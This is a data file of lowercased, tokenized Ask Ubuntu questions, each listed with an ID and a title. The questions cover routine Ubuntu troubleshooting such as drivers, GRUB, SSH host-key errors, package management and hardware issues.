231479	`` no such file '' when running a 32-bit program on a 64-bit system	i downloaded a chromium snapshot and unzipped it , like this : michael @ ubuntu : /opt/chrome-linux $ ls chrome libffmpegsumo.so nacl_irt_x86_32.nexe chrome.1 libppgooglenaclpluginchrome.so product_logo_48.png chrome_100_percent.pak locales resources chrome.pak nacl_helper resources.pak chrome_sandbox nacl_helper_bootstrap xdg-mime chrome-wrapper nacl_irt_srpc_x86_32.nexe xdg-settings but when i try to run chrome , it is n't there ... michael @ ubuntu : /opt/chrome-linux $ ./chrome bash : ./chrome : no such file or directory does anyone know why it wo n't open ? running xubuntu 12.10 amd64 . michael @ ubuntu : /opt/chrome-linux $ ldd /opt/chrome-linux/* | grep -i `` not found '' ldd : /opt/chrome-linux/locales : not regular file ldd : /opt/chrome-linux/resources : not regular file
231481	keyboard debounce problem after login	my password has a double character in it . i can type in my password with no problems . after login , however , i have to wait about half a second when typing double characters . as in : if i type classes , i get clases , unless i pause before typing the second 's ' . this problem extends to all keys ( cursor , enter , backspace etc ) . ubuntu 12.10 daskeyboard all up to date . dual-boot with windows 7 . tried with usb- > ps/2 adapter and direct usb connection . keyboard repeat delay and repeat speed work perfectly . cheers for any help . chris .
231482	ssh : how to handle missing : /home/user/.ssh/known_hosts	i have a old laptop that i 'm using to learn ubuntu server 12.10 . prior to reformatting and installing ubuntu server , ubuntu desktop was used . with ubuntu desktop , i was using a no-ip.com hosted domain to access the machine via ssh ( no problems ) . after the reformat , i 'm trying to use that same no-ip.com domain to access this same machine ( same static ip on home lan ) but now i 'm receiving the following error : warning : remote host identification has changed ! @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ it is possible that someone is doing something nasty ! someone could be eavesdropping on you right now ( man-in-the-middle attack ) ! it is also possible that a host key has just been changed . the fingerprint for the ecdsa key sent by the remote host is xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : xx : ( omitted ) . please contact your system administrator . add correct host key in /home/guest/.ssh/known_hosts to get rid of this message . offending ecdsa key in /home/guest/.ssh/known_hosts:2 remove with : ssh-keygen -f `` /home/guest/.ssh/known_hosts '' -r username.no-ip.org ecdsa host key for username.no-ip.org has changed and you have requested strict checking . host key verification failed . admittedly , i do n't understand much of the error message . after some google searching i opted to run the following command : $ ssh-keygen -r { username.no-ip.org } which gives the following error : ssh-keygen : /home/jerry/.ssh/known_hosts : no such file or directory '' guest '' as suggested in the error message , is n't there either : jerry @ mediaserver : /home $ tree -a . └── jerry ├── .bash_history ├── .bash_logout ├── .bashrc ├── .cache │ └── motd.legal-displayed ├── .config │ └── htop │ └── htoprc └── .profile which begs the following questions : if this file does n't even exist , where 's the discrepancy noted in the error message ? perhaps i need to create this file ? thanks to anyone willing to work through this with me ! -jerry edit : i should add that i am able to ssh locally using the locally assigned ip address .
231484	ubuntu 12.10 dell/broadcom bcm43142 driver install trouble	i am having trouble getting my wireless to work on ubuntu 12.10 . my laptop is a dell 3520 and the wireless chipset is broadcom bcm43142 pci.id [ 14e4:4365 ] rev 1 . the below question looks similar to my issue and i tried it but it did n't work : dell inspiron 5720 wifi ( broadcom bcm43142 , ubuntu 12.10 ) when i try to sudo dpkg -i wire*.deb i get the below message : module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed . when i grep for my installed headers using dpkg -- get-selections | grep headers i see that i have : linux-headers-3.5.0-17 linux-headers-3.5.0-21 linux-headers-3.5.0-21-generic linux-headers-generic any idea what the issue is ? i checked if the wireless-bcm43142-dkms package got installed and it looks like it is when i do : dpkg -- get-selections | grep bcm .
231487	lubuntu 12.10 - running synergy on boot	i 'm using a lubuntu machine as a client via synergy . unfortunately , i have no idea how to make it run before i login ! i 've found several things on google , but i followed their instructions completely and yet it wo n't work ! how can i fix this issue ? ( i 'm new to linux , sorry if this makes me seem really stupid )
231490	how do i share documents with multiple users on the same pc ?	i am not entirely new to linux , but i am now having my daughters and son explore linux and i was wondering where would i put documents and files that are shared between all of the users ?
231491	need drivers for lexmark s410 series printer	i just got ubuntu 11.10 on my sony laptop and i 'm trying to setup a lexmark s410 series printer . the disk provided by lexmark does not open on ubuntu . can someone please help me ?
231501	generating new grub table after new installation	on my computer i have the following partitions : /dev/sda1 * 2048 180410359 90204156 7 hpfs/ntfs/exfat /dev/sda2 180410368 262330367 40960000 7 hpfs/ntfs/exfat /dev/sda3 262330429 599834969 168752270+ f w95 ext 'd ( lba ) /dev/sda4 599840768 625135615 12647424 7 hpfs/ntfs/exfat /dev/sda5 262330431 451089134 94379352 83 linux /dev/sda6 451089198 599834969 74372886 83 linux sda1 is the windows vista partition and is bootable . sda3 is an extended partition containing two linux partitions : sda5and sda6 . sda5 contains my old linux installation ( ubuntu 10.04 ) and sda6 contains my new linux installation ( ubuntu 12.04 ) . during installation , ubuntu 12.04 has configured grub so that i get all three operating systems in the boot menu , i.e . ubuntu 12.04 ( /dev/sda6 ) windows vista ( /dev/sda1 ) ubuntu 10.04 ( /dev/sda5 ) after moving all my files to ubuntu 12.04 , i want to format the ubuntu 10.04 partition /dev/sda5 ) and use it to store data . my question is : can i run grub again after i have deleted ubuntu 10.04 to regenerate the boot menu and remove all the ubuntu 10.04 entries ? what is the name of the tool i have to use , in case there is one ?
231502	ubuntu without a cd	i need a way to download ubuntu without the `` power to go '' . i do n't have a dvd that is size able enough to fit ubuntu , but i have an external hard drive or a flash drive that i can use to transfer the files to a fresh computer , meaning nothing is on it yet . i would be willing to try anything someone says i should do to get ubuntu on it , without using a cd or dvd
231503	nvcc compiler setup ubuntu 12.04	i successfully installed the nvidia driver and toolkit for cuda 5 ( but not the samples ) on a 64 bit ubuntu 12.04 box . the samples failed to install even though i previously ran sudo apt-get install freeglut3-dev build-essential libx11-dev libxmu-dev libxi-dev libgl1-mesa-glx libglu1-mesa libglu1-mesa-dev i ca n't seem to find nvcc . i ran export ld_library_path=/usr/local/cuda-5.0/lib : /usr/local/cuda-5.0/lib64 : $ ld_library_path nvcc -v reports that the compiler is not found : nvcc -v no command 'nvcc ' found , did you mean : command 'nvlc ' from package 'vlc-nox ' ( universe ) nvcc : command not found the getting started guide has n't been of much help here : http : //docs.nvidia.com/cuda/cuda-getting-started-guide-for-linux/index.html what 's going on here ? do i need to install the gpu computing sdk samples to get nvcc ? : /
231504	install ubuntu on a usb hard drive ( not live )	some time ago i made a question asking how to install ubuntu on a usb external hard drive without losing its external storage ability . they 've closed my question and sent to this one . today i did the steps `` installing ubuntu to a removable usb drive with virtual box '' . but when i try to use the hard drive as a normal usb stick , the system does n't recognize it . i 'm using windows , the windows detects the drive . although the bootable ubuntu works fine , the windows does n't recognize as hard drive unit . does it really lead for what i wanted to ?
231506	amd fglrx driver graphic switch problem	i have laptop with ubuntu 12.04 64 bit . my laptop have mobile graphics amd radeon hd 6370m onboard ( amd + intel gpu ) , problem is with switching current gpu , i can switch from amd to intel , but after reboot system doesnt work as expected . depending on the driver version there are several problems : - ubuntu loads with full desktop , but with generic driver - ubuntu loads without desktop with `` reconfigure driver '' dialog - ubuntu loads without desktop saying can not found some libgl.so.1 or something similar . my question is : how to get switching gpu working under ubuntu , i can only work with amd gpu ( or disable switching in bios and work only with intel ) .
231508	ubuntu 12.10 mobile broadband asks password but does n't connect	when i plug my zte device ubuntu sees it asks for password accepts it a notification appears at the bottom but nothing happens . when i enter network settings the options button is disabled for mobile broadband . i tried to downgrade modemmanager to 5.2.0 but it didi n't work . how can i solve this . thanks , edit 1 : sudo lsusb output bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 2232:1005 bus 002 device 003 : id 0a5c:219c broadcom corp . bus 002 device 005 : id 19d2:1256 zte wcdma technologies msm
231512	photoshop installation in 10.10	hi all i am new to ubuntu using ver 10.10 anyone tell me how to install the photoshop using terminal . i tried googling all result yields to install wine so i open the ubuntu software center and type wine but its display untrusted service package ( while installation ) .
231514	ubuntu problem at the beginning	i have a problem at the beginning on ubuntu , after i start my computer , there comes a purple screen what says : '' gnu grub version 1.99-21ubuntu3 list of ubuntu versions use the arrows to move and enter to boot the selected os . press e to edit the commands before booting or `` c '' for a command-line '' ok , most of you would say , `` open the command line '' but its not so easy , no matter hell how i try to press my keyboard buttons , it wont do anything , i tried all buttons on my keyboard but it wont do anything ... and yes my keyboard works and i 've tried different keyboards , and there is no way to skip that screen , so can someone who is a good with these things , tell me what to do next ? : (
231516	wine and system audio mute one another	i 'm running into an awkward problem . here 's the thing : if i start up my computer and run a wine instance ( guild wars 2 , in this case , though it does n't and should n't matter ) , sound works fine . while the sound works , the application does not show up under the `` sound '' tab in settings . and any other application launched thereafter will not have sound until the wine instance is closed . i 'm assuming wine runs alsa . if i start any other application that requires sound before running guild wars 2 , guild wars 2 will not have any sound . all the other applications appear to run pulseaudio . does this sound familiar to anyone ?
231522	if i have ubuntu on a usb , and install it will it remove windows ?	so windows vista is on my hard-drive and ubuntu is on my usb . if i were to install ubuntu when my usb is in , would it just fully install it on my usb or would it override windows ?
231523	ubuntu 12.10 64 bit boots live cd but ca n't install on sony vaio svs1511	i need some help . during install first steps ubuntu installer stops during hdd detection . ( just before he asks about install side by side with win ) . it is a 750gb seagate with uefi system and win 7 64 bit , verified ubuntu md5 and image is correct , trying to install from usb , but as i mentioned live works fine and everything works can access hdd and partitions no problem . i just cant install as the installer hangs . i have been reading some articles but all mention boot issues and none mention the installer hanging . anyone has any ideas ?
231525	12.04 lts upgrade error on libuuid1	in the process of trying to fix a problem with skype on my ubuntu 12.04 lts host , i managed to break libuuid1 , and i have tried everything i could think of : sudo apt-get dist-upgrade sudo apt-get install libuuid1 sudo apt-get upgrade -f sudo apt-get -o apt : :immediate-configure=no upgrade sudo apt-get autoremove but keep getting the same error which looks like a vicious circle : the following packages have unmet dependencies : libuuid1 : breaks : libuuid1 : i386 ( ! = 2.20.1-1ubuntu3 ) but 2.20.1-5.3 is installed libuuid1 : i386 : breaks : libuuid1 ( ! = 2.20.1-5.3 ) but 2.20.1-1ubuntu3 is installed does anyone have any suggestion on how to fix this , short of reinstalling ubuntu ?
231526	virtualbox errors out when trying to install ubuntu ( failed to open iso )	whenever i try to install ubuntu 12.10/12.04 using the regular iso in a virtualbox vm , it does not work and produces the following error : failed to open the cd/dvd image /home/ewt/documents/iso/ubuntu-12.10-desktop-i386.iso . could not get the storage format of the medium '/home/ewt/documents/iso/ubuntu-12.10-desktop-i386.iso' ( verr_not_supported ) . result code : vbox_e_iprt_error ( 0x80bb0005 ) component : medium interface : imedium { 53f9cc0c-e0fd-40a5-a404-a7a5272082cd } callee : ivirtualbox { c28be65f-1a8f-43b4-81f1-eb60cb516e66 }
231530	ca n't left click after plugging in cyborg r.a.t . 9 mouse	i have a cyborg r.a.t 9 mouse and when ever i plug it into my computer , i ca n't left click . strangely enough , the mouse works fine at the login screen , but not after i log in . i 'm also not able to alt+tab to other programs . i 've looked through the other questions for the r.a.t . 3 , 5 , and 7 mouses , but none of them have solutions that work . i 'm running ubuntu 12.04.1 on a lenovo thinkpad t520 .
231531	recover data from unreadable ntfs partition	i have an asus laptop with windows and ubuntu alongside . when i try to boot windows , it gets to the windows logo and restarts automatically . looks like recovery starts but all the recovery options fail . not even command prompt works . started startup recovery which ran for a day and did not yield any results . inserted flash with recovery image—not readable . in windows recovery option `` recovery image '' is not visible . cd-rom—dead ... . ubuntu can not access the hdd . ubuntu error message : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . here is my screenshot in ubuntu . recovery mode in windows offers to load drivers . tried ntfsfix , and recover superblocks ... did not work . have no clue what i should do . please help , and be specific if you can as i do not know what am i doing at all !
231533	php not properly configured	i just installed php.5.1.2 on ubuntu server . i tried to run simple test : < ? phpinfo ( ) ? > it displayed the information but , also display the html tags : < /table > < br / > < h2 > php license < /h2 > < table border= '' 0 '' cellpadding= '' 3 '' width= '' 600 '' > < tr class= '' v '' > < td > < p > this program is free software ; you can redistribute it and/or modify it under the terms of the php license as published by the php group and included in the distribution in the file : license < /p > < p > this program is distributed in the hope that it will be useful , but without any warranty ; without even the implied warranty of merchantability or fitness for a particular purpose . < /p > < p > if you did not receive a copy of the php license , or have any questions about php licensing , please contact license @ php.net . < /p > < /td > < /tr > < /table > < br / > < /div > < /body > < /html > i compiled from source . i did not find a good way to remove it . can someone tell me what 's wrong ?
231534	full screen mode is n't full screen	i am try to do 100 % full screen mode , i am using ubuntu 12.10 , and on the left is the side bar and the top is the menu . when i run full screen mode it does n't cover up those two menu bars , it sits next to them : it should cover the left menu bar and the top black bar . anyone have any idea why it does n't ? package sscce ; import java.awt.graphicsdevice ; import java.awt.graphicsenvironment ; import javax.swing.jframe ; public class main extends jframe { public main ( ) { graphicsenvironment ge = graphicsenvironment.getlocalgraphicsenvironment ( ) ; graphicsdevice mydevice = ge.getdefaultscreendevice ( ) ; this.setundecorated ( true ) ; this.setdefaultcloseoperation ( jframe.exit_on_close ) ; mydevice.setfullscreenwindow ( this ) ; } public static void main ( string [ ] args ) { main main = new main ( ) ; } }
231535	can i install ubuntu on a system that does not currently have an operating system ?	can i install ubuntu on a laptop that has been wiped clean and does not currently have an operating system ? i do n't have a windows system disk , only a recovery disk , which is useless .
231544	opengl log file ( mesa )	recently my firefox started to freeze i have a strong feeling that it has to do something with opengl , but i ca n't prove it , because i ca n't find any opengl or mesa log file . and yes i looked at /var/log/syslog and /var/log/xorg.0.log.old but except backtrace i was n't able to find anything else about the error . where can i find some log files that logs everything graphics related ?
231547	copy text on unselect , not on select	most of my copy/paste needs are spent replacing text . i love the middle-mouse copy/paste feature of *nix systems , and i use it a lot , but it is annoying that , when pasting , i always have to click before , or after , the text i want to replace , paste , then select the text to remove , and press delete . i can use normal copy-paste ( ctrl-c , ctrl-v ) , but middle mouse is so much quicker and universal ( works in terminals , etc ) . i know this is a petty request , but i am wondering if there would be a way so selected text would get clipboarded only after i unselect it , in which case i could simply : select text to copy move to other window or to other place in text file select text to remove paste , and thus replace the text to remove in one sweep
231550	how do i prevent my hdmi-audio-only connected gpu from powering off itself ?	i have a pc running ubuntu and xbmc with the following specifications : cpu - amd a6-3500 apu - radeon ( tm ) hd graphics integrated discrete graphics card : amd hd6400 i got the hd6400 just to have output sound over hdmi . it all start working great , however when it 's been idle for a while the sound output is lost and it seems the card has been turned off completely . perhaps this is a power saving feature as the graphics power is not needed , but i 'd like to know if it is possible to keep the hd6400 on .
231557	when installing ubuntu , it takes me to a harddrive screen to install help ?	a few steps into the installation , there is a screen showing my hard drive , with sda1 , sda2 and sda3 partitions . but when i click to install with one of them , it can not find the root file . how can i get past this and install successfully ?
231561	kubuntu 12.10 , signal out of range after grub .	i installed kubuntu 12.10 from usb , had to edit grub aswell . grub appears to be working properly ( dual booting with windows 8 ) . everything works fine until selecting `` ubuntu '' from grub . screen goes black and my monitor says `` video format not supported '' . the usb kubuntu works like a charm , 1920x1080 60hz . but the hdd-install of kubuntu does n't . problem is not grub-related , nor ca n't i find xorg.conf from /etc/x11 folder . i 'm clueless on where to go next or what to do .
231562	what is the difference between `apt-get purge` and `apt-get remove` ?	is there any difference between sudo apt-get purge < package-name > and sudo apt-get remove < package-name > ? i often see people recommend one or the other . in other words , what does apt-get purge remove that apt-get remove does n't ?
231569	how do i download and install packages without an internet connection ?	i need to install some packages to add a nic driver to my kernel . because i do n't have it yet , it 's not possible for me to do this from my system . what is the best way to solve my problem ?
231570	why command line completion does n't work anymore with `` : > '' ?	i 've got a file called ( for example ) myapp.log . on a 12.04 system i could enter : > my followed by the tab key and the rest of the filename would be filled in ( or if more than 1 file with a name that begins with `` my '' it would require additional letters until uniqueness was achieved ) . now i 've upgraded to 12.10 and the filename expansion no longer works for : > . filename expansion works for other commands as expected . has something changed ?
231572	no internet even though connected to wifi network	i am very new to ubuntu ( like yesterday ! ) and decided to run a dual boot of ubuntu using the windows installer . after some initial problems , it was installed successfully . however , i am only connected to the internet for about two minutes time consecutively , as the wifi connection seems to become dead then . other devices on the same wifi network can access the internet just fine at that time . when i 'm using windows 8 on the exact same machine , i 'm also not experiencing this issue . the internet connection on ubuntu works for just a few minutes allowing me to open one or two web pages or to find a program in the software centre and it will then completely drop out , while the network indicator still says it 's connected . i can work around the problem a little bit by disconnecting to the wifi manually , then reconnecting again . yet , that only works for the same time as it will happen again after a few minutes . the machine is a toshiba satelitte c850 . i would appreciate some help taking my inexperience with ubuntu into account . update : ok i installed ubuntu 12.10 on a toshiba satellite c850 with an intel i5-3210m and 64bit system using windows installer . plugging in using an ethernet cable makes no difference .
231574	panel problem ( xfce ) in xubuntu 12	i would like to delete the `` window buttons '' from the panel.. there is no option to do such thing . what can i do ? here 's what i 've tried : panel - > add new items ... - > window buttons ( switch between open windows using buttons )
231577	what is the use of this second , almost unused ubuntu partiton ?	i installed ubuntu on my netbook quite some time ago , and i do n't remember what did i do - but i 'd expect i went with more or less default settings . now i have two partitions ( one ext3 and one ext4 , the first one being bigger and practically unused , apart from an empty lost+found directory ) . what ( apart from my stupidity , which might be the cause - e.g. , it 's not impossible that i wanted it to be my /home and somehow forgot to actually tell the installer to do so ) might be the cause of such a strange situation ? if this partition is not really necessary ( which is probably the case - it is not being mounted by default anyway ) , what is the best way to move my /home there ? i imagine that this should suffice : i mount that partition under /mnt or anywhere and cp -rp /home/* there . i use gparted to make it my new /home . i boot to check whether everything works . i manually unmount it to manually clean the old /home . did i miss something ? edit : as eric carvalho asked , here 's my output of fdisk -l : $ language=c sudo fdisk -l disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x05c9ff3a device boot start end blocks id system /dev/sda1 * 2048 409599 203776 7 hpfs/ntfs/exfat /dev/sda2 417690 285075455 142328883 7 hpfs/ntfs/exfat /dev/sda3 285075456 323862527 19393536 7 hpfs/ntfs/exfat /dev/sda4 323864574 488396799 82266113 5 extended /dev/sda5 323864576 328058879 2097152 82 linux swap / solaris /dev/sda6 328060928 449107698 60523385+ 83 linux /dev/sda7 449107968 486324223 18608128 83 linux /dev/sda8 486326272 488396799 1035264 82 linux swap / solaris and df -h ( which i guess is more or less irrelevant , since the partition is unmounted by default ) : $ language=c df -h filesystem size used avail use % mounted on /dev/sda7 18g 16g 1,1g 94 % / udev 488m 12k 488m 1 % /dev tmpfs 198m 876k 198m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 495m 224k 495m 1 % /run/shm
231578	install .deb files without any internet	i want to install ndiskgtk and whenever i click the .deb file , it gets me through the software center . i do n't have any internet so i ca n't install it . will this method above work ? i am 13 years old , so i 'm not really that smart with linux . i want to install ndiskgtk ( i think that 's what it 's called ) so that i can get internet to work .
231579	upgrading latex pgfplots in ubuntu 12.04	i have pgfplots for latex installed but i 'm not sure how to upgrade it to the newest version . when i do a search for pgfplots , it returns lots of folders ... the sourceforge download has a zip file for the current version , but i 'm not sure where to extract this . the current documentation has n't been very helpful either , although maybe i 'm just misunderstanding it .
231582	missing ram and unsupported hardware driver issue	in a bottom right corner , appear a logo `` amd unsupportde hardware '' . i 've tryed to follow some procedure ( sudo apt-get install fglrx-updates -- - then reboot ) but does n't disappear . ubuntu find drivers by it-self , `` fgrlx ati/amd '' and `` '' fgrlx ati/amd '' post-release '' but i can install only the first ... the second one , failed during installation procedure . do you have any ideas ?
231585	running out of inodes	i can not update ubuntu because i have 99 % inode usage . what is the easiest way for me to alleviate this problem ? thanks for your help .
231586	single keys are not responding	since last update some keys ( 3 , 4 , w , arrow to the right ) are not functioning/responding . how can i find out if it 's a hardware or software problem ?
231587	installing dotnet 2.0 on 64 bit machine	i have a speed-reading program i purchased with uses dotnet2 . however , dotnet2 does n't run on 64 bit wine . how would i install dotnet2 ?
231591	how to apply a php bug patch	i want to uptake fix for this php bug : https : //bugs.php.net/bug.php ? id=52043 i am not sure on how can i install this patch . conceptually i understand i need to follow following steps : get php code & gd module code apply code fix or patch to code compile reinstall using compiled files but i have never done these steps before , so i am not sure about commands for any of the above steps . can someone elaborate on this process . i am using ubuntu 12.04 32-bit , and this bug is blocking me from using gd module with php . also is there a tool or script to do the complete patching process in an automated way ?
231607	ubuntu 12.04 , broken update manager , phpmyadmin , and many other things	i 'm using ubuntu 12.04 with xfce my story is a more than a week long , but from today i have lot of strange problems with system and apache2 , mysql , phpmyadmin , update manager , and some other . i had apache2 , mysql and phpmyadmin working without any troubles . story begins from installing and configuring system for ssh . i changed some settings in hosts file and some permissions in /home/user and some other witch i do n't remember now . as i discovered later my apache2 , mysql and phpmyadmin did n't work at all . after lot of googling and trying many settings , reinstalling packages i solved problems with apache2 and mysql , they do work , but phpmyadmin still does n't work . when i enter http : //localhost/phpmyadmin/ i got can not start session without errors , please check errors given in your php and/or webserver log file and configure your php installation properly . in time of this story i made all possible system updates by update manager , like i always do . after some reboot i noticed that my terminal have all key shortcuts blank ! but before they were like ctrl+shift+t , ctrl+shift+c , etc . my update manager crashed could not open file /var/lib/dpkg/status - open 13 permission denied . i did n't change any permissions there plymouth , metacity crashed too . i reinstalled them , and now i not saw crash reports about them . i reinstalled also dbconfig-common . my icon of internet connection dissapeard from the top bar , but i can open `` network connections '' from apps menu and internet is working . all of the above i make in xfce , but when i switched to unity 2d i saw all windows are without borders . i found that i should use unity -- replace so i did but it do n't work $ unity -- replace checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x1e00004 compiz ( core ) - warn : failed to receive configurenotify event on 0x1400002 compiz ( core ) - warn : failed to receive configurenotify event on 0x1200002 compiz ( core ) - warn : failed to receive configurenotify event on 0x3000004 initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done ( compiz:15150 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed warn 2012-12-22 02:56:45 unity.ibus < unknown > :0 unable to load /var/lib/dbus/machine-id : failed to open file '/var/lib/dbus/machine-id ' : permission denied initializing unityshell options ... done compiz ( core ) - warn : unhandled configurenotify on 0x3200090 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0x3200093 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0x3200096 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0x3200099 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . error 2012-12-22 02:56:46 unity.glib-gobject < unknown > :0 g_object_unref : assertion `g_is_object ( object ) ' failed starting gtk-window-decorator compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct i have no idea why so many things are broken and i even do n't know where to begin repairs . i 'm googling from hours and days . please help , give some ideas .
231609	how to make notebook boot from usb	i would like to install ubuntu using a live usb . i created the bootable usb following instructions from http : //www.ubuntu.com/download/help/create-a-usb-stick-on-windows with another laptop running windows . my notebook came without an os . i 've inserted the usb and pressed fn while it starts up . when i turn it on , it shows the manufacturer splash screen , then the following options : 1 - load freedos with maximum ram free , using emm386 2 - load freedos including himem xms-memory driver 3 - load freedos without drivers enter a choice : [ ] f5=bypass startup files f8=confirm each line of config.sys/autoexec.bat [ n ] the notebook i want to install ubuntu on is an asus k45vm . what i would like to know is how to make it boot from the usb drive .
231614	what is causing my graphics to fail ?	occasionally when i 'm viewing a program through vlc and i maximize it to full screen it will distort the video so i can only hear audio . then when i minimize again it will only work at some resolutions but most of the time the video does n't work . this is solved by a reboot but this problem has become a regular occurrence now . i 've tried running vlc from a console but i experience unhelpful error messages or other output when it happens . does anyone have any ideas on how i might go about solving this ? here is what the video looks like : http : //i.imgur.com/xwbwl.jpg i 'm currently using amd/ati graphical drivers . could that have anything to do with it ? the issue has persisted for months now .
231616	rhythmbox will no longer attach to launcher	i have been reorganizing my launcher . now rhythmbox will no longer attach to it when it is minimized . so when i want to skip past ads on my favorite podcast , i have to go up there to the menubar , find that tiny little triangle ( the rhythmbox window will not appear unless i click directly on the little triangle ) , and then the rhythmbox gui window appears from the middle of the desktop , move the slider to skip past the ads , and then minimize it so that i can get back to what i am working on with a clean desktop . this is inconvenient . how can i re-familiarize rhythmbox with the launcher ?
231617	dungeon defenders has choppy video and it crashes	i 've bought the humble indie bundle 7 and i want to play dungeon defenders but all i get is choppy video , freezing and , later on , unclickable and window . i use amd graphic with fglrx and intel i5 . has anyone managed to make it work ? i 've managed to play first level but it is still far from playable . i 've left that small window mode and it somehow worked , but i could n't get mouse outside to unity and resolution was bad .
231622	how do i boot windows ?	i installed ubuntu 12.10 wubi but am a bit unnerved by the fact that all of my windows files and settings are not visible to me and i ca n't figure out how to boot windows . can someone help a guy out who is in over his head ?
231623	download problem	i 'm trying to create a disk and i 've downloaded the installation file twice and my computer ca n't find it . if i open the firefox downloads box it shows up there , but when i click it nothing comes up and when i right-click it open and open containing folder are both in grey . on the downloads folder owner downloads , it is n't there at all . what what did i do wrong ? can some kind person talk my computer-illiterate self through this ?
231631	12.04 ubuntu : configuring laptop to hook up to tv using hdmi cable ?	i 'm trying to use an hdmi cable to connect my hp dv5 notebook to a 32 '' sony bravia tv in order to watch hulu stuff on a bigger screen . however , google has been thoroughly unhelpful thus far ! when i hook the computer up to the tv using the windows partition , it automatically switches the display settings so that the sound and video on the tv are synced up with what 's on the laptop screen . in the ubuntu partition , i think that it 's detecting the tv as another monitor rather than as a tv , so i get a dual monitor display , which i do n't want ! plus , the sound is coming out of the laptop rather than out of the tv . i do n't know if the laptop 's intel driver is enabled for tv in the ubuntu partition ( i do n't think it 's an nvidia driver , but i do n't know how to check it ) , and i do n't know how to manually change the settings to optimize tv display . edit : i think this is the relevant information from the lspci command : 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) does n't seem like i have an nvidia chip . i figured that i did n't , since the terminal did n't recognize commands pertaining to it . my ultimate goal is to mirror the laptop output on the tv screen -- is this doable ?
231634	ubuntu 12.04 installation wnt wrong , partial install on wrong hd	i attempted an install of 12.04 on my main pc . i mistakenly left-on the power to my 300g external drive . during the install for some odd reason it began installing to the 300gb external with all my important files on it . when i seen the light glow on the external i immediately canceled the install . in retrospect i have 298gb free on the drive with 3 empty folders : etc , lost+found , and media . all my former data is n't accessible ( of course ) and only shows these 3 folders . question : how can i get my drive back to its former state ; un-install the install ; or recover my data ?
231637	windows not loading from either grub or burg ?	i 'm very sorry if this has been asked before , but i can not find a relevant post that could help me . here 's the problem : windows 7 seems to be able to boot from it 's own hdd and bootloader , but then when trying to run it through grub or burg it goes back to post from the windows logo . it also gets detected as windows 8 , and i have n't installed that ever . my layout is as follows : 1tb - windows hdd - no bootloader . 320gb - downloads - somehow has the windows bootloader on it ? 250gb - ubuntu hdd - grub/burg . now i can boot fine from windows bootloader , but swapping around in bios to go to windows/ubuntu is a pain . i 've tried using the grub customiser to sort out the windows boot , but it keeps crashing when clicking on `` ok '' . tried re-installing the windows bootloader , to no effect . any ideas ? http : //paste.ubuntu.com/1457155/ thanks , ben .
231638	how `` install along side windows '' option works	i have created an unallocated space of 10gb on my hdd through windows . i want to know how does the option `` install along side with windows '' of ubuntu 12.10 work ? will it use the unallocated space or will it ignore it and try to create a new partition , taking space `` randomly '' from the drive ? regards
